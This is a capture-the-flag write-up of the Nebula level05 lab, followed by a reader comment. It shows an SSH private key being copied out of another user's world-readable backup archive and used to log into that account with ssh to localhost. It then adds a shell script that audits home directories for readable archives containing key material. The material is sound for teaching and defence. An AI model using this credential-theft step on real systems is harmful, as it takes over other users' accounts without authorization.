Check the flag05 home directory. You are looking for weak directory permissions
Let’s start looking in /home/flag05:
level05@nebula:/home/flag05$ ls -asl
total 9
0 drwxr-x--- 1 flag05 level05 80 2014-06-03 04:19 .
0 drwxr-xr-x 1 root root 420 2012-08-27 07:18 ..
0 drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup
4 -rw------- 1 flag05 flag05 13 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 flag05 flag05 60 2014-06-03 04:17 .cache
1 -rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
0 drwx------ 2 flag05 flag05 70 2011-11-20 20:13 .ssh
Compare to the home directory of level05:
level05@nebula:/home/flag05$ ls -asl /home/level05
total 9
0 drwxr-x--- 1 level05 level05 100 2014-06-04 21:55 .
0 drwxr-xr-x 1 root root 420 2012-08-27 07:18 ..
4 -rw------- 1 level05 level05 298 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 level05 level05 220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 level05 level05 60 2014-06-03 04:15 .cache
1 -rw-r--r-- 1 level05 level05 675 2011-05-18 02:54 .profile
So flag05 has two things level05 does not: .ssh, the user's SSH key store, and .backup. The .ssh directory is mode 0700, so we can't read it, but .backup is mode 0755, readable and traversable by everyone, which is the weak directory permission the hint points at.
Let’s look in .backup:
level05@nebula:/home/flag05/.backup$ ls -asl
total 2
0 drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .
0 drwxr-x--- 1 flag05 level05 80 2014-06-03 04:19 ..
2 -rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz
A single backup .tgz, and it is world-readable (-rw-rw-r--). Let's copy it out to our own home directory and unpack it:
level05@nebula:~$ cp /home/flag05/.backup/backup-19072011.tgz ./
level05@nebula:~$ tar zxvf backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
That's flag05's private key (id_rsa), public key (id_rsa.pub) and authorized_keys. Because we unpacked in our own home directory, the files landed in /home/level05/.ssh/, which is where ssh looks for a default identity, so no -i switch is needed. If flag05's live authorized_keys still lists that public key, the private key will work on the local machine (ssh refuses a private key that other users can read, so check its mode if the login is rejected):
level05@nebula:~$ ssh flag05@localhost
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
Simple. That's why you should keep your private key private, including every copy of it: a backup left in a world-readable directory is as good as the key itself.
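As an added example, not part of the original write-up, here is a small POSIX shell audit for the condition this level relies on: archives in a home directory that other users can read and that contain SSH key material. The function names are my own, and the fixture it builds under mktemp is constructed for the demonstration, with placeholder text standing in for real keys.

```shell
#!/bin/sh
# Added example, not from the Nebula write-up: audit a directory tree for
# archives other users can read that contain SSH key material.
# Function names are assumptions for this demo; needs only POSIX sh, find, tar, grep.

# Regular files under $1 with the group-read (040) or other-read (004) bit set.
find_readable_files() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) -print 2>/dev/null
}

# Members of gzip tar archive $1 named like a private key or authorized_keys.
# Prints nothing (and succeeds) when $1 is not a readable archive.
list_key_members() {
    tar tzf "$1" 2>/dev/null \
        | grep -E '(^|/)(id_(rsa|dsa|ecdsa|ed25519)|authorized_keys)$' || true
}

# Print every .tgz/.tar.gz under $1 that other users can read and that ships
# key material: exactly the backup-19072011.tgz situation on the level.
audit_home() {
    find_readable_files "$1" | while IFS= read -r f; do
        case "$f" in
            *.tgz|*.tar.gz)
                if [ -n "$(list_key_members "$f")" ]; then
                    printf '%s\n' "$f"
                fi
                ;;
        esac
    done
}

# Constructed fixture for the demo: a fake /home/flag05 with a locked-down .ssh,
# a world-readable .backup/ holding an archive of placeholder key files, and a
# world-readable archive with no key material that the audit must ignore.
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/home/flag05/.backup" "$fx/home/flag05/.ssh" "$fx/stage/.ssh"
    chmod 700 "$fx/home/flag05/.ssh"
    printf 'PLACEHOLDER, not a real private key\n' > "$fx/stage/.ssh/id_rsa"
    printf 'PLACEHOLDER, not a real public key\n' > "$fx/stage/.ssh/id_rsa.pub"
    cp "$fx/stage/.ssh/id_rsa.pub" "$fx/stage/.ssh/authorized_keys"
    chmod 600 "$fx/stage/.ssh/id_rsa"
    tar czf "$fx/home/flag05/.backup/backup-19072011.tgz" -C "$fx/stage" .ssh
    chmod 755 "$fx/home/flag05/.backup"
    chmod 664 "$fx/home/flag05/.backup/backup-19072011.tgz"
    printf 'alias ll="ls -l"\n' > "$fx/stage/.bashrc"
    tar czf "$fx/home/flag05/dotfiles.tgz" -C "$fx/stage" .bashrc
    chmod 644 "$fx/home/flag05/dotfiles.tgz"
    printf '%s\n' "$fx"
}

# Run:  sh audit.sh --demo      (or call audit_home /home/flag05 on a real box)
if [ "${1:-}" = "--demo" ]; then
    fx=$(make_fixture)
    echo "readable archives with key material under $fx/home/flag05:"
    audit_home "$fx/home/flag05"
    rm -rf "$fx"
fi
```

On the demo fixture the audit reports only .backup/backup-19072011.tgz; dotfiles.tgz is just as readable but carries no key material, so it is skipped. Pointed at a real /home/flag05 as level05 it would flag the same archive, and as flag05 the fix is the obvious one: chmod 700 .backup, or better, don't keep a copy of the private key in a backup at all.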
marlon
September 13, 2018 at 5:07pm
I had to use some other switches for this
ssh -i id_rsa flag05@localhost